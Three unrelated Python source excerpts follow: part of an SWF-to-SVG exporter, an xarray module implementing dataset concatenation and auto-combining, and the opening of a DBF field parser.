display_tags = self.get_display_tags(tag.tags)
self.export_display_list(display_tags, parent)
def export_define_shape(self, tag):
self.shape_exporter.debug = isinstance(tag, TagDefineShape4)
tag.shapes.export(self.shape_exporter)
def export_define_shapes(self, tags):
for tag in tags:
if isinstance(tag, SWFTimelineContainer):
self.export_define_sprite(tag)
self.export_define_shapes(tag.tags)
elif isinstance(tag, TagDefineShape):
self.export_define_shape(tag)
elif isinstance(tag, TagJPEGTables):
if tag.length > 0:
self.jpegTables = tag.jpegTables
elif isinstance(tag, TagDefineBits):
self.export_define_bits(tag)
elif isinstance(tag, TagDefineBitsLossless):
self.export_define_bits_lossless(tag)
elif isinstance(tag, TagDefineFont):
self.export_define_font(tag)
elif isinstance(tag, TagDefineText):
self.export_define_text(tag)
def export_display_list(self, tags, parent=None):
self.clip_depth = 0
for tag in tags:
self.export_display_list_item(tag, parent)
def export_display_list_item(self, tag, parent=None):
pass
def export_image(self, tag, image=None):
pass
def get_display_tags(self, tags, z_sorted=True):
dp_tuples = []
for tag in tags:
if isinstance(tag, TagPlaceObject):
dp_tuples.append((tag, tag.depth))
elif isinstance(tag, TagShowFrame):
break
if z_sorted:
dp_tuples = sorted(dp_tuples, key=lambda tag_info: tag_info[1])
display_tags = []
for item in dp_tuples:
display_tags.append(item[0])
return display_tags
def serialize(self):
return None
class SVGExporter(BaseExporter):
def __init__(self, swf=None, margin=0):
self._e = objectify.ElementMaker(annotate=False,
namespace=SVG_NS, nsmap={None : SVG_NS, "xlink" : XLINK_NS})
self._margin = margin
super(SVGExporter, self).__init__(swf)
def export(self, swf, force_stroke=False):
""" Exports the specified SWF to SVG.
@param swf The SWF.
@param force_stroke Whether to force strokes on non-stroked fills.
"""
self.svg = self._e.svg(version=SVG_VERSION)
self.force_stroke = force_stroke
self.defs = self._e.defs()
self.root = self._e.g()
self.svg.append(self.defs)
self.svg.append(self.root)
self.shape_exporter.defs = self.defs
self._num_filters = 0
self.fonts = dict([(x.characterId,x) for x in swf.all_tags_of_type(TagDefineFont)])
self.fontInfos = dict([(x.characterId,x) for x in swf.all_tags_of_type(TagDefineFontInfo)])
# GO!
super(SVGExporter, self).export(swf, force_stroke)
# Setup svg @width, @height and @viewBox
# and add the optional margin
self.bounds = SVGBounds(self.svg)
self.svg.set("width", "%dpx" % round(self.bounds.width))
self.svg.set("height", "%dpx" % round(self.bounds.height))
if self._margin > 0:
self.bounds.grow(self._margin)
vb = [self.bounds.minx, self.bounds.miny,
self.bounds.width, self.bounds.height]
self.svg.set("viewBox", "%s" % " ".join(map(str,vb)))
# Return the SVG as StringIO
return self._serialize()
def _serialize(self):
return cStringIO(etree.tostring(self.svg,
encoding="UTF-8", xml_declaration=True))
def export_define_sprite(self, tag, parent=None):
id = "c%d"%tag.characterId
g = self._e.g(id=id)
self.defs.append(g)
self.clip_depth = 0
super(SVGExporter, self).export_define_sprite(tag, g)
def export_define_font(self, tag):
fontInfo = self.fontInfos[tag.characterId]
if not fontInfo.useGlyphText:
return
defs = self._e.defs(id="font_{0}".format(tag.characterId))
for index, glyph in enumerate(tag.glyphShapeTable):
# Export the glyph as a shape and add the path to the "defs"
# element to be referenced later when exporting text.
code_point = fontInfo.codeTable[index]
pathGroup = glyph.export().g.getchildren()
if len(pathGroup):
path = pathGroup[0]
path.set("id", "font_{0}_{1}".format(tag.characterId, code_point))
# SWF glyphs are always defined on an EM square of 1024 by 1024 units.
path.set("transform", "scale({0})".format(float(1)/EM_SQUARE_LENGTH))
# We'll be setting the color on the USE element that
# references this element.
del path.attrib["stroke"]
del path.attrib["fill"]
defs.append(path)
self.defs.append(defs)
def export_define_text(self, tag):
g = self._e.g(id="c{0}".format(int(tag.characterId)))
g.set("class", "text_content")
x = 0
y = 0
for rec in tag.records:
if rec.hasXOffset:
x = rec.xOffset/PIXELS_PER_TWIP
if rec.hasYOffset:
y = rec.yOffset/PIXELS_PER_TWIP
size = rec.textHeight/PIXELS_PER_TWIP
fontInfo = self.fontInfos[rec.fontId]
if not fontInfo.useGlyphText:
inner_text = ""
xValues = []
for glyph in rec.glyphEntries:
code_point = fontInfo.codeTable[glyph.index]
# Ignore control characters
if code_point in range(32):
continue
if fontInfo.useGlyphText:
use = self._e.use()
use.set(XLINK_HREF, "#font_{0}_{1}".format(rec.fontId, code_point))
use.set(
'transform',
"scale({0}) translate({1} {2})".format(
size, float(x)/size, float(y)/size
)
)
color = ColorUtils.to_rgb_string(ColorUtils.rgb(rec.textColor))
use.set("style", "fill: {0}; stroke: {0}".format(color))
g.append(use)
else:
inner_text += unichr(code_point)
xValues.append(str(x))
x = x + float(glyph.advance)/PIXELS_PER_TWIP
if not fontInfo.useGlyphText:
text = self._e.text(inner_text)
text.set("font-family", fontInfo.fontName)
text.set("font-size", str(size))
text.set("fill", ColorUtils.to_rgb_string(ColorUtils.rgb(rec.textColor)))
text.set("y", str(y))
text.set("x", " ".join(xValues))
if fontInfo.bold:
text.set("font-weight", "bold")
if fontInfo.italic:
text.set("font-style", "italic")
g.append(text)
self.defs.append(g)
def export_define_shape(self, tag):
self.shape_exporter.force_stroke = self.force_stroke
super(SVGExporter, self).export_define_shape(tag)
shape = self.shape_exporter.g
shape.set("id", "c%d" % tag.characterId)
self.defs.append(shape)
def export_display_list_item(self, tag, parent=None):
g = self._e.g()
use = self._e.use()
is_mask = False
if tag.hasMatrix:
use.set("transform", _swf_matrix_to_svg_matrix(tag.matrix))
if tag.hasClipDepth:
self.mask_id = "mask%d" % tag.characterId
self.clip_depth = tag.clipDepth
g = self._e.mask(id=self.mask_id)
# make sure the mask is completely filled white
paths = self.defs.xpath("./svg:g[@id='c%d']/svg:path" % tag.characterId, namespaces=NS)
for path in paths:
path.set("fill", "#ffffff")
elif tag.depth <= self.clip_depth and self.mask_id is not None:
g.set("mask", "url(#%s)" % self.mask_id)
filters = []
filter_cxform = None
self._num_filters += 1
filter_id = "filter%d" % self._num_filters
svg_filter = self._e.filter(id=filter_id)
if tag.hasColorTransform:
filter_cxform = self.export_color_transform(tag.colorTransform, svg_filter)
filters.append(filter_cxform)
if tag.hasFilterList and len(tag.filters) > 0:
cxform = "color-xform" if tag.hasColorTransform else None
f = self.export_filters(tag, svg_filter, cxform)
if len(f) > 0:
filters.extend(f)
if tag.hasColorTransform or (tag.hasFilterList and len(filters) > 0):
self.defs.append(svg_filter)
use.set("filter", "url(#%s)" % filter_id)
use.set(XLINK_HREF, "#c%s" % tag.characterId)
g.append(use)
if is_mask:
self.defs.append(g)
else:
if parent is not None:
parent.append(g)
else:
self.root.append(g)
return use
def export_color_transform(self, cxform, svg_filter, result='color-xform'):
fe_cxform = self._e.feColorMatrix()
fe_cxform.set("in", "SourceGraphic")
fe_cxform.set("type", "matrix")
fe_cxform.set("values", " ".join(map(str, cxform.matrix)))
fe_cxform.set("result", "cxform")
fe_composite = self._e.feComposite(operator="in")
fe_composite.set("in2", "SourceGraphic")
fe_composite.set("result", result)
svg_filter.append(fe_cxform)
svg_filter.append(fe_composite)
return result
def export_filters(self, tag, svg_filter, cxform=None):
num_filters = len(tag.filters)
elements = []
attr_in = None
for i in range(0, num_filters):
swf_filter = tag.filters[i]
#print swf_filter
if isinstance(swf_filter, FilterDropShadow):
elements.append(self.export_filter_dropshadow(swf_filter, svg_filter, cxform))
#print swf_filter.strength
pass
elif isinstance(swf_filter, FilterBlur):
pass
elif isinstance(swf_filter, FilterGlow):
#attr_in = SVGFilterFactory.export_glow_filter(self._e, svg_filter, attr_in=attr_in)
#elements.append(attr_in)
pass
elif isinstance(swf_filter, FilterBevel):
pass
elif isinstance(swf_filter, FilterGradientGlow):
pass
elif isinstance(swf_filter, FilterConvolution):
pass
elif isinstance(swf_filter, FilterColorMatrix):
attr_in = SVGFilterFactory.export_color_matrix_filter(self._e, svg_filter, swf_filter.colorMatrix, svg_filter, attr_in=attr_in)
elements.append(attr_in)
pass
elif isinstance(swf_filter, FilterGradientBevel):
pass
else:
raise Exception("unknown filter: ", swf_filter)
return elements
# <filter id="test-filter" x="-50%" y="-50%" width="200%" height="200%">
# <feGaussianBlur in="SourceAlpha" stdDeviation="6" result="blur"/>
# <feOffset dy="0" dx="0"/>
# <feComposite in2="SourceAlpha" operator="arithmetic"
# k2="-1" k3="1" result="shadowDiff"/>
# <feFlood flood-color="black" flood-opacity="1"/>
# <feComposite in2="shadowDiff" operator="in"/>
# </filter>;
def export_filter_dropshadow(self, swf_filter, svg_filter, blend_in=None, result="offsetBlur"):
gauss = self._e.feGaussianBlur()
gauss.set("in", "SourceAlpha")
gauss.set("stdDeviation", "6")
gauss.set("result", "blur")
if swf_filter.knockout:
composite0 = self._e.feComposite(
in2="SourceAlpha", operator="arithmetic",
k2="-1", k3="1", result="shadowDiff")
flood = self._e.feFlood()
flood.set("flood-color", "black")
flood.set("flood-opacity", "1")
composite1 = self._e.feComposite(
in2="shadowDiff", operator="in", result=result)
svg_filter.append(gauss)
svg_filter.append(composite0)
svg_filter.append(flood)
svg_filter.append(composite1)
else:
SVGFilterFactory.create_drop_shadow_filter(self._e, svg_filter,
None,
swf_filter.blurX/20.0,
swf_filter.blurY/20.0,
blend_in,
result)
#print etree.tostring(svg_filter, pretty_print=True)
return result
def export_image(self, tag, image=None):
if image is not None:
buff = BytesIO()
image.save(buff, "PNG")
buff.seek(0)
data_url = _encode_png(buff.read())
img = self._e.image()
img.set("id", "c%s" % tag.characterId)
img.set("x", "0")
img.set("y", "0 ")
img.set("width", "%s" % str(image.size[0]))
img.set("height", "%s" % str(image.size[1]))
img.set(XLINK_HREF, "%s" % data_url)
self.defs.append(img)
class SingleShapeSVGExporter(SVGExporter):
"""
An SVG exporter which knows how to export a single shape.
NB: This class is here just for backward compatibility.
Use SingleShapeSVGExporterMixin instead to mix with other functionality.
"""
def __init__(self, margin=0):
super(SingleShapeSVGExporter, self).__init__(margin = margin)
def export_single_shape(self, shape_tag, swf):
class MySingleShapeSVGExporter(SingleShapeSVGExporterMixin, SVGExporter):
pass
exporter = MySingleShapeSVGExporter()
return exporter.export(swf, shape=shape_tag)
class SingleShapeSVGExporterMixin(object):
def export(self, swf, shape, **export_opts):
""" Exports the specified shape of the SWF to SVG.
@param swf The SWF.
@param shape Which shape to export, either by characterId(int) or as a Tag object.
"""
# If `shape` is given as int, find corresponding shape tag.
if isinstance(shape, Tag):
shape_tag = shape
else:
shapes = [x for x in swf.all_tags_of_type((TagDefineShape, TagDefineSprite)) if x.characterId == shape]
if len(shapes):
shape_tag = shapes[0]
else:
raise Exception("Shape %s not found" % shape)
from swf.movie import SWF
# find a typical use of this shape
example_place_objects = [x for x in swf.all_tags_of_type(TagPlaceObject) if x.hasCharacter and x.characterId == shape_tag.characterId]
if len(example_place_objects):
place_object = example_place_objects[0]
characters = swf.build_dictionary()
ids_to_export = place_object.get_dependencies()
ids_exported = set()
tags_to_export = []
# this had better form a dag!
while len(ids_to_export):
id = ids_to_export.pop()
if id in ids_exported or id not in characters:
continue
tag = characters[id]
ids_to_export.update(tag.get_dependencies())
tags_to_export.append(tag)
ids_exported.add(id)
tags_to_export.reverse()
tags_to_export.append(place_object)
else:
place_object = TagPlaceObject()
place_object.hasCharacter = True
place_object.characterId = shape_tag.characterId
tags_to_export = [ shape_tag, place_object ]
stunt_swf = SWF()
stunt_swf.tags = tags_to_export
return super(SingleShapeSVGExporterMixin, self).export(stunt_swf, **export_opts)
class FrameSVGExporterMixin(object):
def export(self, swf, frame, **export_opts):
""" Exports a frame of the specified SWF to SVG.
@param swf The SWF.
@param frame Which frame to export, by 0-based index (int)
"""
self.wanted_frame = frame
return super(FrameSVGExporterMixin, self).export(swf, *export_opts)
def get_display_tags(self, tags, z_sorted=True):
current_frame = 0
frame_tags = dict() # keys are depths, values are placeobject tags
for tag in tags:
if isinstance(tag, TagShowFrame):
if current_frame == self.wanted_frame:
break
current_frame += 1
elif isinstance(tag, TagPlaceObject):
if tag.hasMove:
orig_tag = frame_tags.pop(tag.depth)
if not tag.hasCharacter:
tag.characterId = orig_tag.characterId
# this is for NamesSVGExporterMixin
if not tag.hasName:
tag.instanceName = orig_tag.instanceName
frame_tags[tag.depth] = tag
elif isinstance(tag, TagRemoveObject):
del frame_tags[tag.depth]
return super(FrameSVGExporterMixin, self).get_display_tags(frame_tags.values(), z_sorted)
class NamesSVGExporterMixin(object):
'''
Add class="n-<name>" to SVG elements for tags that have an instanceName.
'''
def export_display_list_item(self, tag, parent=None):
use = super(NamesSVGExporterMixin, self).export_display_list_item(tag, parent)
if hasattr(tag, 'instanceName') and tag.instanceName is not None:
use.set('class', 'n-%s' % tag.instanceName)
return use
class SVGFilterFactory(object):
# http://commons.oreilly.com/wiki/index.php/SVG_Essentials/Filters
# http://dev.opera.com/articles/view/svg-evolution-3-applying-polish/
@classmethod
def create_drop_shadow_filter(cls, e, filter, attr_in=None, blurX=0, blurY=0, blend_in=None, result=None):
gaussianBlur = SVGFilterFactory.create_gaussian_blur(e, attr_deviaton="1", result="blur-out")
offset = SVGFilterFactory.create_offset(e, "blur-out", blurX, blurY, "the-shadow")
blend = SVGFilterFactory.create_blend(e, blend_in, attr_in2="the-shadow", result=result)
filter.append(gaussianBlur)
filter.append(offset)
filter.append(blend)
return result
@classmethod
def export_color_matrix_filter(cls, e, filter, matrix, svg_filter, attr_in=None, result='color-matrix'):
attr_in = "SourceGraphic" if attr_in is None else attr_in
fe_cxform = e.feColorMatrix()
fe_cxform.set("in", attr_in)
fe_cxform.set("type", "matrix")
fe_cxform.set("values", " ".join(map(str, matrix)))
fe_cxform.set("result", result)
filter.append(fe_cxform)
#print etree.tostring(filter, pretty_print=True)
return result
@classmethod
def export_glow_filter(cls, e, filter, attr_in=None, result="glow-out"):
attr_in = "SourceGraphic" if attr_in is None else attr_in
gaussianBlur = SVGFilterFactory.create_gaussian_blur(e, attr_in=attr_in, attr_deviaton="1", result=result)
filter.append(gaussianBlur)
return result
@classmethod
def create_blend(cls, e, attr_in=None, attr_in2="BackgroundImage", mode="normal", result=None):
blend = e.feBlend()
attr_in = "SourceGraphic" if attr_in is None else attr_in
blend.set("in", attr_in)
blend.set("in2", attr_in2)
blend.set("mode", mode)
if result is not None:
blend.set("result", result)
return blend
@classmethod
def create_gaussian_blur(cls, e, attr_in="SourceAlpha", attr_deviaton="3", result=None):
gaussianBlur = e.feGaussianBlur()
gaussianBlur.set("in", attr_in)
gaussianBlur.set("stdDeviation", attr_deviaton)
if result is not None:
gaussianBlur.set("result", result)
return gaussianBlur
@classmethod
def create_offset(cls, e, attr_in=None, dx=0, dy=0, result=None):
offset = e.feOffset()
if attr_in is not None:
offset.set("in", attr_in)
offset.set("dx", "%d" % round(dx))
offset.set("dy", "%d" % round(dy))
if result is not None:
offset.set("result", result)
return offset
class SVGBounds(object):
def __init__(self, svg=None):
self.minx = 1000000.0
self.miny = 1000000.0
self.maxx = -self.minx
self.maxy = -self.miny
self._stack = []
self._matrix = self._calc_combined_matrix()
if svg is not None:
self._svg = svg;
self._parse(svg)
def add_point(self, x, y):
self.minx = x if x < self.minx else self.minx
self.miny = y if y < self.miny else self.miny
self.maxx = x if x > self.maxx else self.maxx
self.maxy = y if y > self.maxy else self.maxy
def set(self, minx, miny, maxx, maxy):
self.minx = minx
self.miny = miny
self.maxx = maxx
self.maxy = maxy
def grow(self, margin):
self.minx -= margin
self.miny -= margin
self.maxx += margin
self.maxy += margin
@property
def height(self):
return self.maxy - self.miny
def merge(self, other):
self.minx = other.minx if other.minx < self.minx else self.minx
self.miny = other.miny if other.miny < self.miny else self.miny
self.maxx = other.maxx if other.maxx > self.maxx else self.maxx
self.maxy = other.maxy if other.maxy > self.maxy else self.maxy
def shrink(self, margin):
self.minx += margin
self.miny += margin
self.maxx -= margin
self.maxy -= margin
@property
def width(self):
return self.maxx - self.minx
def _parse(self, element):
if element.get("transform") and element.get("transform").find("matrix") < 0:
pass
if element.get("transform") and element.get("transform").find("matrix") >= 0:
self._push_transform(element.get("transform"))
if element.tag == "{%s}path" % SVG_NS:
self._handle_path_data(str(element.get("d")))
elif element.tag == "{%s}use" % SVG_NS:
href = element.get(XLINK_HREF)
if href:
href = href.replace("#", "")
els = self._svg.xpath("./svg:defs//svg:g[@id='%s']" % href,
namespaces=NS)
if len(els) > 0:
self._parse(els[0])
for child in element.getchildren():
if child.tag == "{%s}defs" % SVG_NS: continue
self._parse(child)
if element.get("transform") and element.get("transform").find("matrix") >= 0:
self._pop_transform()
def _build_matrix(self, transform):
if transform.find("matrix") >= 0:
raw = str(transform).replace("matrix(", "").replace(")", "")
f = list(map(float, re.split("\s+|,", raw)))
return Matrix2(f[0], f[1], f[2], f[3], f[4], f[5])
def _calc_combined_matrix(self):
m = Matrix2()
for mat in self._stack:
m.append_matrix(mat)
return m
def _handle_path_data(self, d):
parts = re.split("[\s]+", d)
for i in range(0, len(parts), 2):
try:
p0 = parts[i]
p1 = parts[i+1]
p0 = p0.replace("M", "").replace("L", "").replace("Q", "")
p1 = p1.replace("M", "").replace("L", "").replace("Q", "")
v = [float(p0), float(p1)]
w = self._matrix.multiply_point(v)
self.minx = w[0] if w[0] < self.minx else self.minx
self.miny = w[1] if w[1] < self.miny else self.miny
self.maxx = w[0] if w[0] > self.maxx else self.maxx
self.maxy = w[1] if w[1] > self.maxy else self.maxy
except:
continue
def _pop_transform(self):
m = self._stack.pop()
self._matrix = self._calc_combined_matrix()
return m
def _push_transform(self, transform):
self._stack.append(self._build_matrix(transform))
self._matrix = self._calc_combined_matrix()
def _encode_jpeg(data):
return "data:image/jpeg;base64," + base64.encodestring(data)[:-1]
def _encode_png(data):
return "data:image/png;base64," + base64.encodestring(data)[:-1]
def _swf_matrix_to_matrix(swf_matrix=None, need_scale=False, need_translate=True, need_rotation=False, unit_div=20.0):
if swf_matrix is None:
values = [1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]
else:
values = swf_matrix.to_array()
if need_rotation:
values[1] /= unit_div
values[2] /= unit_div
if need_scale:
values[0] /= unit_div
values[3] /= unit_div
if need_translate:
values[4] /= unit_div
values[5] /= unit_div
return values
def _swf_matrix_to_svg_matrix(swf_matrix=None, need_scale=False, need_translate=True, need_rotation=False, unit_div=20.0):
values = _swf_matrix_to_matrix(swf_matrix, need_scale, need_translate, need_rotation, unit_div)
str_values = ",".join(map(str, values))
return "matrix(%s)" % str_values
|
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import warnings
import pandas as pd
from . import utils
from .alignment import align
from .merge import merge
from .pycompat import iteritems, OrderedDict, basestring
from .variable import Variable, as_variable, IndexVariable, concat as concat_vars
def concat(objs, dim=None, data_vars='all', coords='different',
compat='equals', positions=None, indexers=None, mode=None,
concat_over=None):
"""Concatenate xarray objects along a new or existing dimension.
Parameters
----------
objs : sequence of Dataset and DataArray objects
xarray objects to concatenate together. Each object is expected to
consist of variables and coordinates with matching shapes except for
along the concatenated dimension.
dim : str or DataArray or pandas.Index
Name of the dimension to concatenate along. This can either be a new
dimension name, in which case it is added along axis=0, or an existing
dimension name, in which case the location of the dimension is
unchanged. If dimension is provided as a DataArray or Index, its name
is used as the dimension to concatenate along and the values are added
as a coordinate.
data_vars : {'minimal', 'different', 'all' or list of str}, optional
These data variables will be concatenated together:
* 'minimal': Only data variables in which the dimension already
appears are included.
* 'different': Data variables which are not equal (ignoring
attributes) across all datasets are also concatenated (as well as
all for which dimension already appears). Beware: this option may
load the data payload of data variables into memory if they are not
already loaded.
* 'all': All data variables will be concatenated.
* list of str: The listed data variables will be concatenated, in
addition to the 'minimal' data variables.
If objects are DataArrays, data_vars must be 'all'.
coords : {'minimal', 'different', 'all' o list of str}, optional
These coordinate variables will be concatenated together:
* 'minimal': Only coordinates in which the dimension already appears
are included.
* 'different': Coordinates which are not equal (ignoring attributes)
across all datasets are also concatenated (as well as all for which
dimension already appears). Beware: this option may load the data
payload of coordinate variables into memory if they are not already
loaded.
* 'all': All coordinate variables will be concatenated, except
those corresponding to other dimensions.
* list of str: The listed coordinate variables will be concatenated,
in addition the 'minimal' coordinates.
compat : {'equals', 'identical'}, optional
String indicating how to compare non-concatenated variables and
dataset global attributes for potential conflicts. 'equals' means
that all variable values and dimensions must be the same;
'identical' means that variable attributes and global attributes
must also be equal.
positions : None or list of integer arrays, optional
List of integer arrays which specifies the integer positions to which
to assign each dataset along the concatenated dimension. If not
supplied, objects are concatenated in the provided order.
indexers, mode, concat_over : deprecated
Returns
-------
concatenated : type of objs
See also
--------
merge
auto_combine
"""
# TODO: add join and ignore_index arguments copied from pandas.concat
# TODO: support concatenating scalar coordinates even if the concatenated
# dimension already exists
from .dataset import Dataset
from .dataarray import DataArray
try:
first_obj, objs = utils.peek_at(objs)
except StopIteration:
raise ValueError('must supply at least one object to concatenate')
if dim is None:
warnings.warn('the `dim` argument to `concat` will be required '
'in a future version of xarray; for now, setting it to '
"the old default of 'concat_dim'",
FutureWarning, stacklevel=2)
dim = 'concat_dims'
if indexers is not None: # pragma: nocover
warnings.warn('indexers has been renamed to positions; the alias '
'will be removed in a future version of xarray',
FutureWarning, stacklevel=2)
positions = indexers
if mode is not None:
raise ValueError('`mode` is no longer a valid argument to '
'xarray.concat; it has been split into the `data_vars` '
'and `coords` arguments')
if concat_over is not None:
raise ValueError('`concat_over` is no longer a valid argument to '
'xarray.concat; it has been split into the `data_vars` '
'and `coords` arguments')
if isinstance(first_obj, DataArray):
f = _dataarray_concat
elif isinstance(first_obj, Dataset):
f = _dataset_concat
else:
raise TypeError('can only concatenate xarray Dataset and DataArray '
'objects, got %s' % type(first_obj))
return f(objs, dim, data_vars, coords, compat, positions)
def _calc_concat_dim_coord(dim):
"""
Infer the dimension name and 1d coordinate variable (if appropriate)
for concatenating along the new dimension.
"""
if isinstance(dim, basestring):
coord = None
elif not hasattr(dim, 'dims'):
# dim is not a DataArray or IndexVariable
dim_name = getattr(dim, 'name', None)
if dim_name is None:
dim_name = 'concat_dim'
coord = IndexVariable(dim_name, dim)
dim = dim_name
elif not hasattr(dim, 'name'):
coord = as_variable(dim).to_index_variable()
dim, = coord.dims
else:
coord = dim
dim, = coord.dims
return dim, coord
def _calc_concat_over(datasets, dim, data_vars, coords):
"""
Determine which dataset variables need to be concatenated in the result,
and which can simply be taken from the first dataset.
"""
def process_subset_opt(opt, subset):
if subset == 'coords':
subset_long_name = 'coordinates'
else:
subset_long_name = 'data variables'
if isinstance(opt, basestring):
if opt == 'different':
def differs(vname):
# simple helper function which compares a variable
# across all datasets and indicates whether that
# variable differs or not.
v = datasets[0].variables[vname]
return any(not ds.variables[vname].equals(v)
for ds in datasets[1:])
# all nonindexes that are not the same in each dataset
concat_new = set(k for k in getattr(datasets[0], subset)
if k not in concat_over and differs(k))
elif opt == 'all':
concat_new = (set(getattr(datasets[0], subset)) -
set(datasets[0].dims))
elif opt == 'minimal':
concat_new = set()
else:
raise ValueError("unexpected value for concat_%s: %s"
% (subset, opt))
else:
invalid_vars = [k for k in opt
if k not in getattr(datasets[0], subset)]
if invalid_vars:
raise ValueError('some variables in %s are not '
'%s on the first dataset: %s'
% (subset, subset_long_name, invalid_vars))
concat_new = set(opt)
return concat_new
concat_over = set()
for ds in datasets:
concat_over.update(k for k, v in ds.variables.items()
if dim in v.dims)
concat_over.update(process_subset_opt(data_vars, 'data_vars'))
concat_over.update(process_subset_opt(coords, 'coords'))
if dim in datasets[0]:
concat_over.add(dim)
return concat_over
def _dataset_concat(datasets, dim, data_vars, coords, compat, positions):
"""
Concatenate a sequence of datasets along a new or existing dimension
"""
from .dataset import Dataset, as_dataset
if compat not in ['equals', 'identical']:
raise ValueError("compat=%r invalid: must be 'equals' "
"or 'identical'" % compat)
dim, coord = _calc_concat_dim_coord(dim)
datasets = [as_dataset(ds) for ds in datasets]
datasets = align(*datasets, join='outer', copy=False, exclude=[dim])
concat_over = _calc_concat_over(datasets, dim, data_vars, coords)
def insert_result_variable(k, v):
assert isinstance(v, Variable)
if k in datasets[0].coords:
result_coord_names.add(k)
result_vars[k] = v
# create the new dataset and add constant variables
result_vars = OrderedDict()
result_coord_names = set(datasets[0].coords)
result_attrs = datasets[0].attrs
for k, v in datasets[0].variables.items():
if k not in concat_over:
insert_result_variable(k, v)
# check that global attributes and non-concatenated variables are fixed
# across all datasets
for ds in datasets[1:]:
if (compat == 'identical' and
not utils.dict_equiv(ds.attrs, result_attrs)):
raise ValueError('dataset global attributes not equal')
for k, v in iteritems(ds.variables):
if k not in result_vars and k not in concat_over:
raise ValueError('encountered unexpected variable %r' % k)
elif (k in result_coord_names) != (k in ds.coords):
raise ValueError('%r is a coordinate in some datasets but not '
'others' % k)
elif (k in result_vars and k != dim and
not getattr(v, compat)(result_vars[k])):
verb = 'equal' if compat == 'equals' else compat
raise ValueError(
'variable %r not %s across datasets' % (k, verb))
# we've already verified everything is consistent; now, calculate
# shared dimension sizes so we can expand the necessary variables
dim_lengths = [ds.dims.get(dim, 1) for ds in datasets]
non_concat_dims = {}
for ds in datasets:
non_concat_dims.update(ds.dims)
non_concat_dims.pop(dim, None)
def ensure_common_dims(vars):
# ensure each variable with the given name shares the same
# dimensions and the same shape for all of them except along the
# concat dimension
common_dims = tuple(pd.unique([d for v in vars for d in v.dims]))
if dim not in common_dims:
common_dims = (dim,) + common_dims
for var, dim_len in zip(vars, dim_lengths):
if var.dims != common_dims:
common_shape = tuple(non_concat_dims.get(d, dim_len)
for d in common_dims)
var = var.set_dims(common_dims, common_shape)
yield var
# stack up each variable to fill-out the dataset (in order)
for k in datasets[0].variables:
if k in concat_over:
vars = ensure_common_dims([ds.variables[k] for ds in datasets])
combined = concat_vars(vars, dim, positions)
insert_result_variable(k, combined)
result = Dataset(result_vars, attrs=result_attrs)
result = result.set_coords(result_coord_names)
if coord is not None:
# add concat dimension last to ensure that its in the final Dataset
result[coord.name] = coord
return result
def _dataarray_concat(arrays, dim, data_vars, coords, compat,
positions):
arrays = list(arrays)
if data_vars != 'all':
raise ValueError('data_vars is not a valid argument when '
'concatenating DataArray objects')
datasets = []
for n, arr in enumerate(arrays):
if n == 0:
name = arr.name
elif name != arr.name:
if compat == 'identical':
raise ValueError('array names not identical')
else:
arr = arr.rename(name)
datasets.append(arr._to_temp_dataset())
ds = _dataset_concat(datasets, dim, data_vars, coords, compat,
positions)
return arrays[0]._from_temp_dataset(ds, name)
def _auto_concat(datasets, dim=None):
if len(datasets) == 1:
return datasets[0]
else:
if dim is None:
ds0 = datasets[0]
ds1 = datasets[1]
concat_dims = set(ds0.dims)
if ds0.dims != ds1.dims:
dim_tuples = set(ds0.dims.items()) - set(ds1.dims.items())
concat_dims = set(i for i, _ in dim_tuples)
if len(concat_dims) > 1:
concat_dims = set(d for d in concat_dims
if not ds0[d].equals(ds1[d]))
if len(concat_dims) > 1:
raise ValueError('too many different dimensions to '
'concatenate: %s' % concat_dims)
elif len(concat_dims) == 0:
raise ValueError('cannot infer dimension to concatenate: '
'supply the ``concat_dim`` argument '
'explicitly')
dim, = concat_dims
return concat(datasets, dim=dim)
_CONCAT_DIM_DEFAULT = '__infer_concat_dim__'
def auto_combine(datasets,
concat_dim=_CONCAT_DIM_DEFAULT,
compat='no_conflicts'):
"""Attempt to auto-magically combine the given datasets into one.
This method attempts to combine a list of datasets into a single entity by
inspecting metadata and using a combination of concat and merge.
It does not concatenate along more than one dimension or sort data under any
circumstances. It does align coordinates, but different variables on
datasets can cause it to fail under some scenarios. In complex cases, you
may need to clean up your data and use ``concat``/``merge`` explicitly.
``auto_combine`` works well if you have N years of data and M data
variables, and each combination of a distinct time period and set of data
variables is saved its own dataset.
Parameters
----------
datasets : sequence of xarray.Dataset
Dataset objects to merge.
concat_dim : str or DataArray or Index, optional
Dimension along which to concatenate variables, as used by
:py:func:`xarray.concat`. You only need to provide this argument if the
dimension along which you want to concatenate is not a dimension in
the original datasets, e.g., if you want to stack a collection of
2D arrays along a third dimension.
By default, xarray attempts to infer this argument by examining
component files. Set ``concat_dim=None`` explicitly to disable
concatenation.
compat : {'identical', 'equals', 'broadcast_equals',
'no_conflicts'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
- 'no_conflicts': only values which are not null in both datasets
must be equal. The returned dataset then contains the combination
of all non-null values.
Returns
-------
combined : xarray.Dataset
See also
--------
concat
Dataset.merge
"""
from toolz import itertoolz
if concat_dim is not None:
dim = None if concat_dim is _CONCAT_DIM_DEFAULT else concat_dim
grouped = itertoolz.groupby(lambda ds: tuple(sorted(ds.data_vars)),
datasets).values()
concatenated = [_auto_concat(ds, dim=dim) for ds in grouped]
else:
concatenated = datasets
merged = merge(concatenated, compat=compat)
return merged
|
|
"""
Parser for DBF fields.
"""
import sys
import datetime
import struct
from decimal import Decimal
from .memo import BinaryMemo
PY2 = sys.version_info[0] == 2
if PY2:
decode_text = unicode
else:
decode_text = str
class InvalidValue(bytes):
def __repr__(self):
text = bytes.__repr__(self)
if PY2:
# Make sure the string starts with "b'" in
# "InvalidValue(b'value here')".
text = 'b' + text
return 'InvalidValue({})'.format(text)
class FieldParser:
def __init__(self, table, memofile=None):
"""Create a new field parser
encoding is the character encoding to use when parsing
strings."""
self.table = table
self.dbversion = self.table.header.dbversion
self.encoding = table.encoding
self.char_decode_errors = table.char_decode_errors
self._lookup = self._create_lookup_table()
if memofile:
self.get_memo = memofile.__getitem__
else:
self.get_memo = lambda x: None
def decode_text(self, text):
return decode_text(text, self.encoding, errors=self.char_decode_errors)
def _create_lookup_table(self):
"""Create a lookup table for field types."""
lookup = {}
for name in dir(self):
if name.startswith('parse'):
field_type = name[5:]
if len(field_type) == 1:
lookup[field_type] = getattr(self, name)
